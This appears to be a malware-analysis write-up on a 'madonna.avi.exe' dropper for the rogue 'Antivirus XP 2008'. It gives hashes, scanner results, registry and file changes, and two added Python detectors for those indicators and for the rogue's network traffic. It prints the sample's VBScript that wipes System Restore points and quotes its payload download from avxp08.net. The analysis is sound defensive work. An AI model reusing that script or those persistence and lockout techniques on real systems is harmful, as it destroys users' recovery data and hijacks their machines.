Allowing Outlook Express to display the inline graphics will download and display the following image (resized by me).
File details

Filename: madonna.avi.exe
File size: 196096 bytes
MD5: 55fc167c9b55093cbdb02650e22f508f
SHA1: 20337c32262135deec3b2e5a453dd8216c526e7f
SHA256: 93c82ded9e214bd8abe9634405b446053c21a137188bf0c6d6adac9379180d9e
PEiD: -
File madonna.avi.exe received on 08.22.2008 18:32:38 (columns: scanner, version, signature date, result)
AhnLab-V3 2008.8.21.0 2008.08.22 -
AntiVir 7.8.1.23 2008.08.22 TR/Dropper.Gen
Authentium 5.1.0.4 2008.08.22 -
Avast 4.8.1195.0 2008.08.22 -
AVG 8.0.0.161 2008.08.22 -
BitDefender 7.2 2008.08.22 -
CAT-QuickHeal 9.50 2008.08.22 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.22 -
DrWeb 4.44.0.09170 2008.08.22 -
eSafe 7.0.17.0 2008.08.21 Suspicious File
eTrust-Vet 31.6.6040 2008.08.22 -
Ewido 4.0 2008.08.22 -
F-Prot 4.4.4.56 2008.08.21 -
F-Secure 7.60.13501.0 2008.08.22 Trojan.Win32.Monder.gen
Fortinet 3.14.0.0 2008.08.22 -
GData 2.0.7306.1023 2008.08.20 Trojan.Win32.Monder.gen
Ikarus T3.1.1.34.0 2008.08.22 -
K7AntiVirus 7.10.423 2008.08.21 -
Kaspersky 7.0.0.125 2008.08.22 Trojan.Win32.Monder.gen
McAfee 5367 2008.08.21 -
Microsoft 1.3807 2008.08.22 TrojanDownloader:Win32/Renos.gen!AU
NOD32v2 3380 2008.08.22 a variant of Win32/TrojanDownloader.FakeAlert.HC
Norman 5.80.02 2008.08.22 -
Panda 9.0.0.4 2008.08.22 -
PCTools 4.4.2.0 2008.08.22 -
Prevx1 V2 2008.08.22 -
Rising 20.58.42.00 2008.08.22 -
Sophos 4.32.0 2008.08.22 Mal/EncPk-CZ
Sunbelt 3.1.1571.1 2008.08.22 -
Symantec 10 2008.08.22 -
TheHacker 6.3.0.6.058 2008.08.22 -
TrendMicro 8.700.0.1004 2008.08.22 -
VBA32 3.12.8.4 2008.08.22 -
ViRobot 2008.8.22.1346 2008.08.22 -
VirusBuster 4.5.11.0 2008.08.22 -
Webwasher-Gateway 6.6.2 2008.08.22 Trojan.Dropper.Gen
Technical details

Registry changes:

- Changes the wallpaper and screensaver on the computer. The user's permission to change the background image and the screensaver is disabled as well.

HKEY_CURRENT_USER\Software\Sysinternals\Bluescreen Screen Saver "EulaAccepted"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Control Panel\Desktop "ConvertedWallpaper"
Type: REG_SZ
Data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "SCRNSAVE.EXE"
Type: REG_SZ
Data: C:\WINDOWS\system32\blphcepaj0enej.scr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispBackgroundPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispScrSavPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Control Panel\Colors "Background"
Old type: REG_SZ
New type: REG_SZ
Old data: 58 110 165
New data: 0 0 255
HKEY_CURRENT_USER\Control Panel\Desktop "OriginalWallpaper"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "ScreenSaveActive"
Old type: REG_SZ
New type: REG_SZ
Old data: 0
New data: 1
HKEY_CURRENT_USER\Control Panel\Desktop "Wallpaper"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_CURRENT_USER\Control Panel\Desktop "WallpaperStyle"
Old type: REG_SZ
New type: REG_SZ
Old data: 2
New data: 0
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components "GeneralFlags"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 05, 00, 00, 00
New data: 04, 00, 00, 00

- Disables the Windows System Restore feature, which deletes all currently existing restore points. It then re-enables System Restore and creates a new restore point. This is performed by a VBS script:

```vbscript
' Disable System Restore through the WMI SystemRestore class (this wipes the existing restore points)
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Disable("")

' Re-enable System Restore
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Enable("")

' Create a fresh restore point; if the first call fails, wait 10 seconds, then CreateRestorePoint is called again
CONST DEVICE_DRIVER_INSTALL = 10
CONST BEGIN_SYSTEM_CHANGE = 100
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
If (errResults <> 0) then
WScript.Sleep 10000
End if
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
```

- Creates a Startup entry so that lphcepaj0enej.exe runs on every boot.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "lphcepaj0enej"
Type: REG_SZ
Data: C:\WINDOWS\system32\lphcepaj0enej.exe

- Misc changes.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Software Notifier "InstallID"
Type: REG_SZ
Data: 4a573c18-9505-4bac-ab47-380607f448cb
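The registry changes above are the kind of thing a responder wants to pull out of a change dump automatically: the two Policies\System DWORDs that lock the user out of the Display settings, the wallpaper and screensaver values pointing at files dropped into System32, and the Run key autostart. The following Python script is an added example for this write-up, not the original post's code. It parses the same `Key "Value" / Type / Data` dump format quoted above and applies three rules to it; SAMPLE_DUMP is constructed from entries listed in the post (plus one harmless entry that should not fire), and the rule names are this example's own.

```python
"""Check a registry change dump for the desktop-hijack and autostart indicators described above.

Added example for this write-up; it is not the original post's code. It parses
the same 'Key "Value" / Type / Data' dump format the post quotes and applies
three rules to the resulting entries. SAMPLE_DUMP is constructed from entries
listed in the post; the rule names are this example's own.
"""
import re
from dataclasses import dataclass

# Constructed sample in the post's dump format (a subset of the entries above,
# plus ScreenSaveActive, which is harmless on its own and must not be flagged).
SAMPLE_DUMP = r"""
HKEY_CURRENT_USER\Control Panel\Desktop "SCRNSAVE.EXE"
Type: REG_SZ
Data: C:\WINDOWS\system32\blphcepaj0enej.scr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispBackgroundPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "NoDispScrSavPage"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_CURRENT_USER\Control Panel\Desktop "Wallpaper"
Old type: REG_SZ
New type: REG_SZ
Old data:
New data: C:\WINDOWS\system32\phcepaj0enej.bmp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "lphcepaj0enej"
Type: REG_SZ
Data: C:\WINDOWS\system32\lphcepaj0enej.exe
HKEY_CURRENT_USER\Control Panel\Desktop "ScreenSaveActive"
Old type: REG_SZ
New type: REG_SZ
Old data: 0
New data: 1
"""


@dataclass
class RegEntry:
    key: str
    name: str
    type: str = ""
    data: str = ""


# A key line looks like:  HKEY_...\Some Key "ValueName"
_KEY_LINE = re.compile(r'^(HKEY_[^"]*?)\s+"([^"]*)"\s*$')


def parse_dump(text):
    """Parse the dump into RegEntry objects, keeping only the new (post-change) state."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _KEY_LINE.match(line)
        if m:
            current = RegEntry(key=m.group(1), name=m.group(2))
            entries.append(current)
            continue
        if current is None:
            continue
        label, _, value = line.partition(":")
        label = label.strip().lower()
        if label in ("type", "new type"):
            current.type = value.strip()
        elif label in ("data", "new data"):
            current.data = value.strip()
    return entries


def dword(data):
    """Decode the dump's little-endian byte list ('01, 00, 00, 00') to an integer."""
    parts = [int(p, 16) for p in (s.strip() for s in data.split(",")) if p]
    return int.from_bytes(bytes(parts), "little")


POLICY_LOCKS = {"NoDispBackgroundPage", "NoDispScrSavPage"}
DESKTOP_KEY = r"hkey_current_user\control panel\desktop"
DESKTOP_FILE_VALUES = {"scrnsave.exe", "wallpaper", "originalwallpaper", "convertedwallpaper"}


def find_indicators(entries):
    """Return (rule, value name, data) for each entry that matches one of three rules."""
    findings = []
    for e in entries:
        key = e.key.lower()
        # 1. Policy values that hide the Display control panel pages (user locked out).
        if key.endswith(r"\policies\system") and e.name in POLICY_LOCKS \
                and e.type == "REG_DWORD" and dword(e.data) != 0:
            findings.append(("policy_lock", e.name, e.data))
        # 2. Any autostart entry written under the Run key.
        elif key.endswith(r"\currentversion\run"):
            findings.append(("autostart", e.name, e.data))
        # 3. Wallpaper or screensaver pointing at a file placed in System32.
        elif key == DESKTOP_KEY and e.name.lower() in DESKTOP_FILE_VALUES \
                and "\\system32\\" in e.data.lower():
            findings.append(("desktop_file_in_system32", e.name, e.data))
    return findings


def scan_dump(text):
    """Parse a dump and return its indicator findings."""
    return find_indicators(parse_dump(text))


if __name__ == "__main__":
    for rule, name, data in scan_dump(SAMPLE_DUMP):
        print(f"{rule:26} {name:24} {data}")
```

Run against SAMPLE_DUMP the script reports five findings: the two policy locks, the Run entry, and the screensaver and wallpaper values in System32; ScreenSaveActive alone produces nothing, since a user may legitimately turn a screensaver on.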
Files created:

Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).

%Temp%\.tt1.tmp
Date: 8/22/2008 7:02 PM
Size: 0 bytes
%Temp%\.tt1.tmp.vbs
Date: 8/22/2008 7:02 PM
Size: 1,002 bytes
%Temp%\Temp\.tt2.tmp
Date: 8/22/2008 7:03 PM
Size: 0 bytes
%System%\blphcepaj0enej.scr
Date: 8/22/2008 7:03 PM
Size: 118,784 bytes
%System%\lphcepaj0enej.exe
Date: 8/22/2008 6:30 PM
Size: 196,096 bytes
%System%\phcepaj0enej.bmp
Date: 8/22/2008 7:02 PM
Size: 625,208 bytes
%System%\Restore\MachineGuid.txt
Date: 8/22/2008 7:03 PM
Size: 78 bytes
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
Notes

Upon execution madonna.avi.exe immediately changes your background to a new wallpaper.
Windows Scripting is then launched to disable and re-enable System Restore in order to clear all previous restore points and create a new one.
Internet access is requested in order to download additional components. The file will be saved as %Temp%\.tt1.tmp.
.tt1.tmp will be launched by madonna.avi.exe with some command-line parameters. The file will drop and execute 2 files.

```http
GET /soft3/common/16.gif HTTP/1.1
User-Agent: Internet Explorer
Connection: Keep-Alive
Host: stat.avxp08.net

HTTP/1.1 206 Partial Content
Server: nginx/0.6.26
Date: Fri, 22 Aug 2008 16:43:30 GMT
Content-Type: image/gif
Content-Length: 1594051
```

- c:\Program Files\rhcapaj0enej\rhcapaj0enej.exe
- %System%\pphcepaj0enej.exe
An EULA will be displayed for Antivirus XP 2008, but as seen in the image you can't cancel the install or refuse the license agreement. You can't even close the window.
Another VBS script will pin 2 Antivirus XP 2008 shortcuts to the Start menu.
Antivirus XP is now "installed" and it will perform an initial scan. I had to laugh when I saw the results, 2799 infected files on a clean PC ... wow.
Of course we do have some additional registry entries and files. The most interesting change is the modification of the User-Agent string.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform "AntivirXP08"
Type: REG_SZ
Data: AntivirXP08

Concretely this will give the following User-Agent when requesting webpages or downloads:

```http
GET /updates/check.html HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)
Host: www.avxp08.net
Connection: Keep-Alive
```

Yes, "it" even checks for updates.
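The Post Platform token is a useful network-side indicator: once the registry value is written, every Internet Explorer request from the machine carries "AntivirXP08" in the MSIE comment, and the earlier download request stands out for its bare "Internet Explorer" User-Agent and its host. The Python script below is an added example for this write-up, not the original post's code; it parses raw request heads like the two quoted above and applies three rules. The host suffix and the token come from the post, the three captures are constructed (two mirror the post's requests, the third is a benign control), and the rule names are this example's own.

```python
"""Flag the Antivirus XP 2008 network indicators described above in captured HTTP requests.

Added example for this write-up, not the original post's code. The host
suffix and User-Agent token come from the post; the three request captures
below are constructed (two mirror the requests quoted in the post, the third
is a benign control), and the rule names are this example's own.
"""
import re

KNOWN_HOST_SUFFIXES = ("avxp08.net",)   # post: stat.avxp08.net and www.avxp08.net
ROGUE_UA_TOKEN = "AntivirXP08"          # Post Platform token written to the registry

# Constructed captures: raw request heads, CRLF-delimited as on the wire.
CAPTURES = [
    "GET /soft3/common/16.gif HTTP/1.1\r\n"
    "User-Agent: Internet Explorer\r\n"
    "Connection: Keep-Alive\r\n"
    "Host: stat.avxp08.net\r\n\r\n",
    "GET /updates/check.html HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)\r\n"
    "Host: www.avxp08.net\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: www.example.com\r\n\r\n",
]


def parse_request(raw):
    """Split a raw request head into method, path and a lower-cased header dict."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def ua_tokens(ua):
    """Return the ';'-separated tokens inside the UA's parenthesised comment, if any."""
    m = re.search(r"\(([^)]*)\)", ua)
    return [t.strip() for t in m.group(1).split(";")] if m else []


def classify(req):
    """Apply the three indicator rules to one parsed request."""
    findings = []
    host = req["headers"].get("host", "").lower()
    ua = req["headers"].get("user-agent", "")
    # 1. Host is the domain the post shows the sample talking to (exact or subdomain).
    if any(host == s or host.endswith("." + s) for s in KNOWN_HOST_SUFFIXES):
        findings.append("known_bad_host")
    # 2. The rogue's Post Platform token appears as a token in the MSIE comment.
    if ROGUE_UA_TOKEN in ua_tokens(ua):
        findings.append("rogue_ua_token")
    # 3. A UA with no product/version structure at all (the post shows a bare "Internet Explorer").
    if ua and not re.search(r"\d|/", ua):
        findings.append("unversioned_ua")
    return findings


def scan_captures(captures):
    """Return (path, findings) for every capture that triggered at least one rule."""
    hits = []
    for raw in captures:
        req = parse_request(raw)
        findings = classify(req)
        if findings:
            hits.append((req["path"], findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_captures(CAPTURES):
        print(path, ", ".join(findings))
```

Matching the token against the parsed comment tokens rather than with a plain substring search avoids false hits on unrelated strings that happen to contain the same letters, and the host rule accepts any subdomain of the listed domain, which covers both the stat. and www. hosts seen in the post.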
Thx Malekal_morte for forwarding me this nice vid.